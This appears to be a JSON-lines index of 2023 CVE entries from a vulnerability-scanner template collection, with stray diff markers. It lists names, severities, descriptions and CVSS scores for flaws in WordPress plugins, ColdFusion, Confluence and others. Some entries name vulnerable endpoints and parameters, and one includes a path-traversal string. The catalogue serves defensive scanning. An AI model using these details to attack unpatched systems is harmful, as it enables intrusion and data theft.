{"ID":"CVE-2023-22232","Info":{"Name":"Adobe Connect \u003c 12.1.5 - Local File Disclosure","Severity":"medium","Description":"Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature. Exploitation of this issue does not require user interaction\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-22232.yaml"}
{"ID":"CVE-2023-2224","Info":{"Name":"Seo By 10Web \u003c 1.2.7 - Cross-Site Scripting","Severity":"medium","Description":"The SEO by 10Web WordPress plugin before 1.2.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2224.yaml"}
{"ID":"CVE-2023-22432","Info":{"Name":"Web2py URL - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability exists in web2py versions prior to 2.23.1. When using the tool, a web2py user may be redirected to an arbitrary website by accessing a specially crafted URL. As a result, the user may become a victim of a phishing attack.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-22432.yaml"}
{"ID":"CVE-2023-22463","Info":{"Name":"KubePi JwtSigKey - Admin Authentication Bypass","Severity":"critical","Description":"KubePi is a k8s panel. The jwt authentication function of KubePi through version 1.6.2 uses hard-coded Jwtsigkeys, resulting in the same Jwtsigkeys for all online projects. This means that an attacker can forge any jwt token to take over the administrator account of any online project. Furthermore, they may use the administrator to take over the k8s cluster of the target enterprise. `session.go`, the use of hard-coded JwtSigKey, allows an attacker to use this value to forge jwt tokens arbitrarily. The JwtSigKey is confidential and should not be hard-coded in the code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22463.yaml"}
{"ID":"CVE-2023-22478","Info":{"Name":"KubePi \u003c= v1.6.4 LoginLogsSearch - Unauthorized Access","Severity":"high","Description":"KubePi is a modern Kubernetes panel. The API interfaces with unauthorized entities and may leak sensitive information. This issue has been patched in version 1.6.4. There are currently no known workarounds.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-22478.yaml"}
{"ID":"CVE-2023-22480","Info":{"Name":"KubeOperator Foreground `kubeconfig` - File Download","Severity":"critical","Description":"KubeOperator is an open source Kubernetes distribution focused on helping enterprises plan, deploy and operate production-level K8s clusters. In KubeOperator versions 3.16.3 and below, API interfaces with unauthorized entities and can leak sensitive information. This vulnerability could be used to take over the cluster under certain conditions. This issue has been patched in version 3.16.4.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22480.yaml"}
{"ID":"CVE-2023-22515","Info":{"Name":"Atlassian Confluence - Privilege Escalation","Severity":"critical","Description":"Atlassian Confluence Data Center and Server contains a broken access control vulnerability that allows an attacker to create unauthorized Confluence administrator accounts and access Confluence.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22515.yaml"}
{"ID":"CVE-2023-22518","Info":{"Name":"Atlassian Confluence Server - Improper Authorization","Severity":"critical","Description":"All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. There is no impact to confidentiality as an attacker cannot exfiltrate any instance data.\nAtlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22518.yaml"}
{"ID":"CVE-2023-2252","Info":{"Name":"Directorist \u003c 7.5.4 - Local File Inclusion","Severity":"medium","Description":"Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-2252.yaml"}
{"ID":"CVE-2023-22620","Info":{"Name":"SecurePoint UTM 12.x Session ID Leak","Severity":"high","Description":"An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-22620.yaml"}
{"ID":"CVE-2023-2272","Info":{"Name":"Tiempo.com \u003c= 0.1.2 - Cross-Site Scripting","Severity":"medium","Description":"Tiempo.com before 0.1.2 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2272.yaml"}
@ -1921,9 +2032,11 @@
{"ID":"CVE-2023-25346","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-25346.yaml"}
{"ID":"CVE-2023-25573","Info":{"Name":"Metersphere - Arbitrary File Read","Severity":"high","Description":"Metersphere is an open source continuous testing platform. In affected versions an improper access control vulnerability exists in `/api/jmeter/download/files`, which allows any user to download any file without authentication. This issue may expose all files available to the running process. This issue has been addressed in version 1.20.20 lts and 2.7.1\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-25573.yaml"}
{"ID":"CVE-2023-25717","Info":{"Name":"Ruckus Wireless Admin - Remote Code Execution","Severity":"critical","Description":"Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25717.yaml"}
{"ID":"CVE-2023-26035","Info":{"Name":"ZoneMinder Snapshots - Command Injection","Severity":"critical","Description":"ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras.Versions prior to 1.36.33 and 1.37.33 are vulnerable to Unauthenticated Remote Code Execution via Missing Authorization. There are no permissions check on the snapshot action, which expects an id to fetch an existing monitor but can be passed an object to create a new one instead. TriggerOn ends up calling shell_exec using the supplied Id.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-26035.yaml"}
{"ID":"CVE-2023-26067","Info":{"Name":"Lexmark Printers - Command Injection","Severity":"high","Description":"Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2023/CVE-2023-26067.yaml"}
{"ID":"CVE-2023-26255","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjCustomDesignConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26255.yaml"}
{"ID":"CVE-2023-26256","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjFooterNavigationConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26256.yaml"}
{"ID":"CVE-2023-26347","Info":{"Name":"Adobe Coldfusion - Authentication Bypass","Severity":"high","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An unauthenticated attacker could leverage this vulnerability to access the administration CFM and CFC endpoints. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26347.yaml"}
{"ID":"CVE-2023-26360","Info":{"Name":"Unauthenticated File Read Adobe ColdFusion","Severity":"high","Description":"Unauthenticated Arbitrary File Read vulnerability due to deserialization of untrusted data in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2023/CVE-2023-26360.yaml"}
{"ID":"CVE-2023-26469","Info":{"Name":"Jorani 1.0.0 - Remote Code Execution","Severity":"critical","Description":"Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-26469.yaml"}
{"ID":"CVE-2023-2648","Info":{"Name":"Weaver E-Office 9.5 - Remote Code Execution","Severity":"critical","Description":"A vulnerability was found in Weaver E-Office 9.5. It has been classified as critical. This affects an unknown part of the file /inc/jquery/uploadify/uploadify.php. The manipulation of the argument Filedata leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228777 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2648.yaml"}
@ -1941,7 +2054,9 @@
{"ID":"CVE-2023-27524","Info":{"Name":"Apache Superset - Authentication Bypass","Severity":"critical","Description":"Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27524.yaml"}
{"ID":"CVE-2023-27587","Info":{"Name":"ReadToMyShoe - Generation of Error Message Containing Sensitive Information","Severity":"medium","Description":"ReadToMyShoe generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, it will include the full URL of the request, which contains the Google Cloud API key.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-27587.yaml"}
{"ID":"CVE-2023-2766","Info":{"Name":"Weaver OA 9.5 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in Weaver OA 9.5 and classified as problematic. This issue affects some unknown processing of the file /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini. The manipulation leads to files or directories accessible. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-2766.yaml"}
{"ID":"CVE-2023-2779","Info":{"Name":"Super Socializer \u003c 7.13.52 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2779.yaml"}
{"ID":"CVE-2023-2780","Info":{"Name":"Mlflow \u003c2.3.1 - Local File Inclusion Bypass","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.3.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2780.yaml"}
{"ID":"CVE-2023-27922","Info":{"Name":"Newsletter \u003c 7.6.9 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as administrators\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-27922.yaml"}
{"ID":"CVE-2023-2796","Info":{"Name":"EventON \u003c= 2.1 - Missing Authorization","Severity":"medium","Description":"The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-2796.yaml"}
{"ID":"CVE-2023-28121","Info":{"Name":"WooCommerce Payments - Unauthorized Admin Access","Severity":"critical","Description":"An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-28121.yaml"}
{"ID":"CVE-2023-2813","Info":{"Name":"Wordpress Multiple Themes - Reflected Cross-Site Scripting","Severity":"medium","Description":"All of the above Aapna WordPress theme through 1.3, Anand WordPress theme through 1.2, Anfaust WordPress theme through 1.1, Arendelle WordPress theme before 1.1.13, Atlast Business WordPress theme through 1.5.8.5, Bazaar Lite WordPress theme before 1.8.6, Brain Power WordPress theme through 1.2, BunnyPressLite WordPress theme before 2.1, Cafe Bistro WordPress theme before 1.1.4, College WordPress theme before 1.5.1, Connections Reloaded WordPress theme through 3.1, Counterpoint WordPress theme through 1.8.1, Digitally WordPress theme through 1.0.8, Directory WordPress theme before 3.0.2, Drop WordPress theme before 1.22, Everse WordPress theme before 1.2.4, Fashionable Store WordPress theme through 1.3.4, Fullbase WordPress theme before 1.2.1, Ilex WordPress theme before 1.4.2, Js O3 Lite WordPress theme through 1.5.8.2, Js Paper WordPress theme through 2.5.7, Kata WordPress theme before 1.2.9, Kata App WordPress theme through 1.0.5, Kata Business WordPress theme through 1.0.2, Looki Lite WordPress theme before 1.3.0, moseter WordPress theme through 1.3.1, Nokke WordPress theme before 1.2.4, Nothing Personal WordPress theme through 1.0.7, Offset Writing WordPress theme through 1.2, Opor Ayam WordPress theme through 18, Pinzolo WordPress theme before 1.2.10, Plato WordPress theme before 1.1.9, Polka Dots WordPress theme through 1.2, Purity Of Soul WordPress theme through 1.9, Restaurant PT WordPress theme before 1.1.3, Saul WordPress theme before 1.1.0, Sean Lite WordPress theme before 1.4.6, Tantyyellow WordPress theme through 1.0.0.5, TIJAJI WordPress theme through 1.43, Tiki Time WordPress theme through 1.3, Tuaug4 WordPress theme through 1.4, Tydskrif WordPress theme through 1.1.3, UltraLight WordPress theme through 1.2, Venice Lite WordPress theme before 1.5.5, Viala WordPress theme through 1.3.1, viburno WordPress theme before 1.3.2, Wedding Bride WordPress theme before 1.0.2, Wlow WordPress theme before 1.2.7 suffer from the same issue about the search box reflecting the results causing XSS which allows an unauthenticated attacker to exploit against users if they click a malicious link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2813.yaml"}
@ -1953,6 +2068,8 @@
{"ID":"CVE-2023-29084","Info":{"Name":"ManageEngine ADManager Plus - Command Injection","Severity":"high","Description":"Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-29084.yaml"}
{"ID":"CVE-2023-29298","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"An attacker is able to access every CFM and CFC endpoint within the ColdFusion Administrator path /CFIDE/, of which there are 437 CFM files and 96 CFC files in a ColdFusion 2021 Update 6 install.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-29298.yaml"}
{"ID":"CVE-2023-29300","Info":{"Name":"Adobe ColdFusion - Pre-Auth Remote Code Execution","Severity":"critical","Description":"Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29300.yaml"}
{"ID":"CVE-2023-29357","Info":{"Name":"Microsoft SharePoint - Authentication Bypass","Severity":"critical","Description":"Microsoft SharePoint Server Elevation of Privilege Vulnerability\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29357.yaml"}
{"ID":"CVE-2023-29489","Info":{"Name":"cPanel - Cross-Site Scripting","Severity":"medium","Description":"An issue was discovered in cPanel before 11.109.9999.116. Cross Site Scripting can occur on the cpsrvd error page via an invalid webcall ID.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29489.yaml"}
{"ID":"CVE-2023-29622","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"Purchase Order Management v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /purchase_order/admin/login.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29622.yaml"}
{"ID":"CVE-2023-29623","Info":{"Name":"Purchase Order Management v1.0 - Cross Site Scripting (Reflected)","Severity":"medium","Description":"Purchase Order Management v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the password parameter at /purchase_order/classes/login.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29623.yaml"}
@ -1961,78 +2078,165 @@
{"ID":"CVE-2023-29919","Info":{"Name":"SolarView Compact \u003c= 6.00 - Local File Inclusion","Severity":"critical","Description":"There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-29919.yaml"}
{"ID":"CVE-2023-29922","Info":{"Name":"PowerJob V4.3.1 - Authentication Bypass","Severity":"medium","Description":"PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-29922.yaml"}
{"ID":"CVE-2023-29923","Info":{"Name":"PowerJob \u003c=4.3.2 - Unauthenticated Access","Severity":"medium","Description":"PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-29923.yaml"}
{"ID":"CVE-2023-30013","Info":{"Name":"TOTOLink - Unauthenticated Command Injection","Severity":"critical","Description":"TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contain a command insertion vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the \"command\" parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-30013.yaml"}
{"ID":"CVE-2023-30019","Info":{"Name":"Imgproxy \u003c= 3.14.0 - Server-side request forgery (SSRF)","Severity":"medium","Description":"imgproxy \u003c=3.14.0 is vulnerable to Server-Side Request Forgery (SSRF) due to a lack of sanitization of the imageURL parameter.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-30019.yaml"}
{"ID":"CVE-2023-30150","Info":{"Name":"PrestaShop leocustomajax 1.0 \u0026 1.0.0 - SQL Injection","Severity":"critical","Description":"PrestaShop leocustomajax 1.0 and 1.0.0 are vulnerable to SQL Injection via modules/leocustomajax/leoajax.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-30150.yaml"}
{"ID":"CVE-2023-30210","Info":{"Name":"OURPHP \u003c= 7.2.0 - Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerable to Cross Site Scripting (XSS) via /client/manage/ourphp_tz.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30210.yaml"}
{"ID":"CVE-2023-30212","Info":{"Name":"OURPHP \u003c= 7.2.0 - Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30212.yaml"}
{"ID":"CVE-2023-30256","Info":{"Name":"Webkul QloApps 1.5.2 - Cross-site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30256.yaml"}
{"ID":"CVE-2023-30258","Info":{"Name":"MagnusBilling - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Command Injection vulnerability in MagnusSolution magnusbilling 6.x and 7.x allows remote attackers to run arbitrary commands via unauthenticated HTTP request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-30258.yaml"}
{"ID":"CVE-2023-30534","Info":{"Name":"Cacti \u003c 1.2.25 Insecure Deserialization","Severity":"medium","Description":"Cacti is an open source operational monitoring and fault management framework. There are two instances of insecure deserialization in Cacti version 1.2.24.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2023/CVE-2023-30534.yaml"}
{"ID":"CVE-2023-30625","Info":{"Name":"Rudder Server \u003c 1.3.0-rc.1 - SQL Injection","Severity":"high","Description":"Rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-30625.yaml"}
{"ID":"CVE-2023-30777","Info":{"Name":"Advanced Custom Fields \u003c 6.1.6 - Cross-Site Scripting","Severity":"medium","Description":"Advanced Custom Fields beofre 6.1.6 is susceptible to cross-site scripting via the post_status parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30777.yaml"}
{"ID":"CVE-2023-30868","Info":{"Name":"Tree Page View Plugin \u003c 1.6.7 - Cross-Site Scripting","Severity":"medium","Description":"The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30868.yaml"}
{"ID":"CVE-2023-30943","Info":{"Name":"Moodle - Cross-Site Scripting/Remote Code Execution","Severity":"medium","Description":"The vulnerability was found Moodle which exists because the application allows a user to control path of the older to create in TinyMCE loaders. A remote user can send a specially crafted HTTP request and create arbitrary folders on the system. Moodle versions 4.1.x before 4.1.3 and 4.2.x before 4.2.0 are susceptible to an unauthenticated arbitrary folder creation, tracked as CVE-2023-30943. An attacker can leverage the creation of arbitrary folders to carry out a Stored Cross-Site Scripting (XSS) attack on the administration panel, resulting in arbitrary code execution on the server as soon as an administrator visits the panel.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-30943.yaml"}
{"ID":"CVE-2023-31059","Info":{"Name":"Repetier Server - Directory Traversal","Severity":"high","Description":"Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-31059.yaml"}
{"ID":"CVE-2023-31465","Info":{"Name":"TimeKeeper by FSMLabs - Remote Code Execution","Severity":"critical","Description":"An issue was discovered in FSMLabs TimeKeeper 8.0.17 through 8.0.28. By intercepting requests from various timekeeper streams, it is possible to find the getsamplebacklog call. Some query parameters are passed directly in the URL and named arg[x], with x an integer starting from 1; it is possible to modify arg[2] to insert Bash code that will be executed directly by the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-31465.yaml"}
{"ID":"CVE-2023-31548","Info":{"Name":"ChurchCRM v4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-31548.yaml"}
{"ID":"CVE-2023-32117","Info":{"Name":"Integrate Google Drive \u003c= 1.1.99 - Missing Authorization via REST API Endpoints","Severity":"high","Description":"The Integrate Google Drive plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in versions up to, and including, 1.1.99. This makes it possible for unauthenticated attackers to perform a wide variety of operations, such as moving files, creating folders, copying details, and much more.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2023/CVE-2023-32117.yaml"}
{"ID":"CVE-2023-3219","Info":{"Name":"EventON Lite \u003c 2.1.2 - Arbitrary File Download","Severity":"medium","Description":"The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors\nto access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-3219.yaml"}
{"ID":"CVE-2023-32235","Info":{"Name":"Ghost CMS \u003c 5.42.1 - Path Traversal","Severity":"high","Description":"Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-32235.yaml"}
{"ID":"CVE-2023-32243","Info":{"Name":"WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset","Severity":"critical","Description":"Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-32243.yaml"}
{"ID":"CVE-2023-32315","Info":{"Name":"Openfire Administration Console - Authentication Bypass","Severity":"high","Description":"Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-32315.yaml"}
{"ID":"CVE-2023-32563","Info":{"Name":"Ivanti Avalanche - Remote Code Execution","Severity":"critical","Description":"An unauthenticated attacker could achieve the code execution through a RemoteControl server.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-32563.yaml"}
{"ID":"CVE-2023-33338","Info":{"Name":"Old Age Home Management System v1.0 - SQL Injection","Severity":"critical","Description":"Old Age Home Management 1.0 is vulnerable to SQL Injection via the username parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33338.yaml"}
{"ID":"CVE-2023-33405","Info":{"Name":"BlogEngine CMS - Open Redirect","Severity":"medium","Description":"Blogengine.net 3.3.8.0 and earlier is vulnerable to Open Redirect\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-33405.yaml"}
{"ID":"CVE-2023-33439","Info":{"Name":"Faculty Evaluation System v1.0 - SQL Injection","Severity":"high","Description":"Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_task.php?id=\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33439.yaml"}
{"ID":"CVE-2023-33440","Info":{"Name":"Faculty Evaluation System v1.0 - Remote Code Execution","Severity":"high","Description":"Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via /eval/ajax.php?action=save_user.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33440.yaml"}
{"ID":"CVE-2023-3345","Info":{"Name":"LMS by Masteriyo \u003c 1.6.8 - Information Exposure","Severity":"medium","Description":"The plugin does not properly safeguards sensitive user information, like other user's email addresses, making it possible for any students to leak them via some of the plugin's REST API endpoints.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-3345.yaml"}
{"ID":"CVE-2023-33510","Info":{"Name":"Jeecg P3 Biz Chat - Local File Inclusion","Severity":"high","Description":"Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33510.yaml"}
{"ID":"CVE-2023-33568","Info":{"Name":"Dolibarr Unauthenticated Contacts Database Theft","Severity":"high","Description":"An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33568.yaml"}
{"ID":"CVE-2023-33584","Info":{"Name":"Enrollment System Project v1.0 - SQL Injection Authentication Bypass","Severity":"critical","Description":"Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33584.yaml"}
